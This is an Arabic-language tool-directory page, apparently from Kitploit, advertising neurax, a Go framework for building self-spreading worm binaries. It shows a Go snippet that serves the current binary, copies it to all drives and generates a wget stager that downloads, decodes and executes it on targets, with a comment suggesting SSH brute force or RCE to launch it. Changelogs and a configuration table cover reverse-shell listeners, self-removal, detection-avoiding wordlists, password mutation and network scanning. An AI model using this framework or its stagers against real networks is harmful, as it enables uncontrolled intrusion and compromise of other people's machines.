Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
neurax — إطار عمل لبناء البرامج الثنائية ذاتية الانتشار | Kitploit
أدوات/GitHubGitHub/redcode-labs/neurax
الاستطلاعهجمات كلمات المرورتوليد الحمولةآليات الاستمراريةالاستغلالالحركة الجانبيةما بعد الاستغلالتحليل البرمجيات الخبيثةالقيادة والسيطرةالفريق الأحمر
GitHubredcode-labs/neurax
1.0k10117منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

neurax

إطار عمل لبناء البرامج الثنائية ذاتية الانتشار

عرض المستودع



Neurax



إطار عمل يساعد في إنشاء برامج ذاتية الانتشار



نظرة عامة

بمساعدة Neurax، يمكن للبرامج الثنائية (binaries) المكتوبة بلغة Go أن تنتشر على الشبكات المحلية والواسعة دون الحاجة إلى خوادم خارجية.

تتيح خيارات التهيئة المتنوعة ومُرتِّلات الأوامر (Stagers) الانتشار السريع عبر بيئات لاسلكية مختلفة.

مثال على الكود

package main
import . "github.com/redcode-labs/Neurax"

func main(){

  //Specify serving port and stager to use
  Nrx.Config.Port = 5555
  Nrx.Config.Stager = "wget"

  //Start a server that exposes the current binary in the background
  go NeuraxServer()
 
  //Copy current binary to all logical drives
  NeuraxDisks()

  //Create a command stager that should be launched on target machine
  //It will download, decode and execute the binary
  cmd_stager := NeuraxStager()

  /* Now you have to somehow execute the command generated above.
     You can use SSH bruteforce, some RCE or whatever else you want ;> */

}



الجديد في الإصدار 2.X (مشروع فرعي منفصل)

  • إعادة هيكلة: التخلي عن الأسلوب الشبيه بالإطار لصالح ملف ثنائي جاهز للاستخدام
  • مُرتِّل wget عام لجميع أهداف UNIX
  • ملف تهيئة واحد لتعديل سلوك الدودة أثناء التشغيل
  • إزالة ذاتية تلقائية عبر unlinkat(2)
  • مثال على استغلال ثغرة CVE الخاصة بـ LinuxKI لتعزيز قدرات الانتشار عبر الشبكة
  • يتم تحميل ملف تهيئة بتنسيق JSON وتقييمه
  • إعادة كتابة مبسّطة لمجمّع المضيف

الجديد في الإصدار 2.5

  • تنفيذ اختياري في الخلفية للملف الثنائي للمرحلة الثانية (N.StagerBg)
  • يقوم مُرتِّل الأوامر بحفظ الملف وتنفيذه في مسار محلي للسياق
  • كما يقوم بإزالة الملف الثنائي المُنزَّل فور نجاح التنفيذ
  • إزالة آلية تنفيذ الأوامر المتزامنة لأسباب تتعلق بالسرعة والاستقرار. سأقدم بديلاً مناسباً قبل الإصدار التالي.
  • N.NoInfectCheck لتعطيل التحقق مما إذا كان المضيف مصاباً بالفعل.
  • سياسة تنفيذ فردية على الجهاز المستهدف، يتم فرضها باستخدام قفل ملف حصري داخل NeuraxServer().
  • إضافة مهمة مصغرة (goroutine) متداخلة لخدمة الملف الثنائي
  • مُرتِّل httrack جديد لنظام Linux
  • قائمة كلمات شائعة معلّقة لتجنب الاكتشاف
  • يمكن لمُرتِّل الأوامر الانتظار قبل إزالة الملف الثنائي (N.StagerRemovalDelay)

الجديد في الإصدار 2.0

  • أدوات تحوير جديدة لقائمة الكلمات + كلمات مرور شائعة حسب الدولة
  • مسح سلبي مُرتجَل
  • خيار .FastScan الذي يجعل عمليات المسح النشط أسرع قليلاً
  • يتم إنشاء قوائم الكلمات حصراً في الذاكرة
  • NeuraxScan() تقبل دالة رد اتصال بدلاً من قناة كوسيط.
  • NeuraxScan() تفحص في حلقة لا نهائية مع إمكانية تعيين فاصل زمني بين كل فحص للشبكة الفرعية أو مجموعة الأهداف
  • بحث عكسي عن DNS للأهداف التي ليست بتنسيق IP
  • استخراج الأهداف المحتملة من ذاكرة التخزين المؤقت لـ ARP
  • إمكانية فحص قائمة محددة فقط من الأهداف + إعطاء أولوية لأهداف معينة (مثل البوابات الافتراضية)
  • إمكانية تحديد الواجهة والمهلة عند استخدام المسح السلبي للشبكة.
  • تحسين مُرتِّل الأوامر (يمكن تنفيذه اختيارياً بصلاحيات مرتفعة / عدة مرات)
  • بعض التغييرات في أسماء الخيارات
  • أصبح NeuraxConfig. هو N. (لأنه أقصر في الكتابة)
  • دوال لتخصيص الذاكرة العشوائي + ترحيل الملف الثنائي
  • إمكانية ربط عدة مُرتِّلات (مثل wget + curl)
  • يمكن ضبط حجم وتعقيد قائمة الكلمات المُنشأة بسهولة (باستخدام خيارات مثل .WordlistExpand)
  • إمكانية تعيين مدة البقاء (TTL) للملف الثنائي المُنشأ

قائمة إعدادات التهيئة

الاسمالوصفالقيمة الافتراضية
Nrx.Config.Stagerاسم مُرتِّل الأوامر المستخدمrandom, platform-compatible
Nrx.Config.StagerSudoإذا كان صحيحاً، يتم تنفيذ مُرتِّلات أوامر Linux بصلاحيات مرتفعةfalse
Nrx.Config.StagerRetryعدد مرات إعادة تنفيذ مُرتِّل الأوامر0
Nrx.Config.StagerRemoveDelayيتم تطبيق تعليمة تأخير قبل إزالة الملف الثنائي المُنزَّلtrue
Nrx.Config.Portالمنفذ المستخدم للخدمة6741
Nrx.Config.Platformالمنصة المستهدفةيتم اكتشافها تلقائياً
Nrx.Config.Pathالمسار الذي يُحفظ فيه الملف الثنائي على المضيف.
Nrx.Config.FileNameالاسم الذي يُخدم به الملف الثنائي المُنزَّل ثم يُحفظrandom
Nrx.Config.Base64ترميز الملف الثنائي المنقول بصيغة base64false
Nrx.Config.CommPortالمنفذ الذي تستخدمه الملفات الثنائية للتواصل فيما بينها7777
Nrx.Config.CommProtoبروتوكول الاتصال بين العقد"udp"
Nrx.Config.ReverseListenerيحتوي على "<host>:<port>" لمعالج الصدفة العكسية عن بُعدغير محدد
Nrx.Config.ReverseProtoالبروتوكول المستخدم للاتصال العكسي"udp"
Nrx.Config.ScanRequiredPortتعتبر NeuraxScan() المضيف نشطاً فقط عندما يكون لديه منفذ معين مفتوحnone
Nrx.Config.ScanPassiveتكتشف NeuraxScan() المضيفين باستخدام مراقبة حركة ARP السلبيةfalse
Nrx.Config.ScanPassiveTimeoutتراقب NeuraxScan() طبقة ARP بهذا العدد من الثواني50 seconds
Nrx.Config.ScanPassiveIfaceالواجهة المستخدمة عند المسح السلبيdefault
Nrx.Config.ScanActiveTimeoutتعيّن NeuraxScan() هذه القيمة كمهلة للمنفذ الممسوح ضوئياً في كل خيط2 seconds
Nrx.Config.ScanPassiveAllتلتقط NeuraxScan() الحزم على جميع الأجهزة المُكتشفةfalse
Nrx.Config.ScanPassiveNoArpلا يقوم المسح السلبي بتعيين فلتر التقاط ARP صارمfalse
Nrx.Config.ScanFirstشريحة تحتوي على عناوين IP يتم فحصها أولاً[]string{}
Nrx.Config.ScanFirstOnlyتقوم NeuraxScan() بفحص المضيفين المحددين فقط داخل .ScanFirstfalse
Nrx.Config.ScanArpCacheتقوم NeuraxScan() بفحص المضيفين الموجودين في ذاكرة التخزين المؤقت لـ ARP أولاً. يعمل فقط مع المسح النشطfalse
Nrx.Config.ScanCidrتقوم NeuraxScan() بفحص هذا النطاق CIDRlocal IP + "\24"
Nrx.Config.ScanActiveThreadsعدد الخيوط المستخدمة في NeuraxScan()10
Nrx.Config.ScanFullRangeتقوم NeuraxScan() بفحص جميع منافذ المضيف المستهدف لتحديد ما إذا كان نشطاًfrom 19 to 300
Nrx.Config.ScanIntervalالفاصل الزمني للنوم قبل فحص الشبكة الفرعية بأكملها مرة أخرى"2m"
Nrx.Config.ScanHostIntervalالفاصل الزمني للنوم قبل فحص المضيف التالي في الوضع النشط"none"
Nrx.Config.ScanGatewayFirstيتم فحص البوابة أولاً عند استخدام المسح النشطfalse
Nrx.Config.Verboseإذا كان صحيحاً، تتم طباعة جميع رسائل الخطأ إلى STDOUTfalse
Nrx.Config.Removeعند حدوث أي أخطاء، يقوم الملف الثنائي بإزالة نفسه من المضيفfalse
Nrx.Config.PreventReexecإذا كان صحيحاً، عندما يطابق أي أمر تلك الأوامر التي تم استلامها مسبقاً، لا يتم تنفيذهtrue
Nrx.Config.WordlistExpandتقوم NeuraxWordlist() بإجراء تحويلات غير قياسية على كلمات الإدخالfalse
Nrx.Config.WordlistCommonإضافة 20 كلمة مرور الأكثر شيوعاً إلى قائمة الكلماتfalse
Nrx.Config.WordlistCommonNumعدد كلمات المرور الشائعة المراد استخدامهاall
Nrx.Config.WordlistCommonCountriesخريطة map[string]int تحتوي على رموز الدول وعدد كلمات المرور المراد استخدامهاmap[string]int
Nrx.Config.WordlistMutatorsالمحولات المراد استخدامها عند تحديد .WordlistExpand{"single_upper", "cyryllic", "encapsule"}
Nrx.Config.WordlistPermuteNumأقصى طول للتبديل الناتج عن NeuraxWordlistPermute()2
Nrx.Config.WordlistPermuteSeparatorحرف فاصل لاستخدامه في التبديلات"-"
Nrx.Config.WordlistShuffleخلط قائمة الكلمات المُنشأة قبل إرجاعهاfalse
Nrx.Config.AllocNumيحدد هذا الإدخال عدد المرات التي يُخصص فيها NeuraxAlloc() ذاكرة عشوائية5
Nrx.Config.Blacklistشريحة تحتوي على عناوين IP المستثناة من أي نوع من أنواع المسح[]string{}
Nrx.Config.FastHTTPيتم تنفيذ طلب HTTP في IsHostInfected() باستخدام مكتبة fasthttpfalse
Nrx.Config.Debugتمكين رسائل التصحيحfalse
Nrx.Config.NoInfectCheckتعطيل التحقق مما إذا كان المضيف مصاباً بالفعلtrue
تنزيل الأداة